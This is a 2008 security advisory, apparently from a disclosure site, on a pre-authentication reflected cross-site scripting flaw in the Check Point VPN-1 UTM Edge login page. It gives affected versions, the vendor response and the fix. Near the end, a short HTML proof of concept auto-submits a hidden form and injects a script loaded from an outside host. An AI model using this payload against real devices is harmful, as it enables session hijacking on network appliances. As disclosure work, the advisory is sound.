|
|
| |
VPN-1 UTM Edge appliances "deliver unified threat management to enterprises with branch offices and simplify security deployments and manageability. VPN-1 UTM Edge appliances consolidate proven enterprise-class technology into a single branch office solution that does not compromise the corporate network and eliminates the branch office as your weakest link. As part of Check Point's Unified Security Architecture, VPN-1 UTM Edge can enforce a global security policy and allows administrators to manage and update thousands of appliances as easily as managing one."
Insufficient input validation and output encoding on the login page allows attacker to perform html-injection by posting suitable string to the login form handler. The injection leads to reflected pre-authentication cross site scripting. |
| |
Credit:
The information has been provided by Henri Lindberg.
The original article can be found at: http://www.louhi.fi/advisory/checkpoint_080306.txt
|
| |
Vulnerable Systems:
* Checkpoint VPN-1 Edge W Embedded NGX version 7.0.48x
Immune Systems:
* Checkpoint VPN-1 Edge W Embedded NGX version 7.5.48
Form based authentication is used only when device is accessed using HTTP. Authentication over HTTPS uses HTTP basic authentication.
The device does not accept the parameters in a GET request, POST request has to be used instead - exploiting the XSS vulnerability requires therefore a bit more effort compared to ordinary GET based reflected cross site scripting vulnerability.
The current version can be checked from http://xxx.xxx.xxx.xxx/pub/test.html where xxx.xxx.xxx.xxx is LAN IP address of the device. The page also displays current product key.
Vendor response:
"Once users register the appliance and connect to the service center (Safe@Office appliances), the latest firmware is automatically downloaded to their appliance. For UTM-1 Edge appliances, the latest firmware version can be downloaded from the Check Point download center. Currently, this is version 7.5.48 that does not contain the reported issue. We believe that customers are not exposed to this issue."
Proof of Concept:
<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none">
<input name="user" value="'<script/src=//l7.fi></script>">
</form>
</body>
</html>
Solution:
Update to version 7.5.48
Disclosure Timeline:
19. February 2008 - Contacted Checkpoint by email
20. February 2008 - Vendor response.
6. March 2008 - Advisory was released
|
|
|
|
|
|
|
|
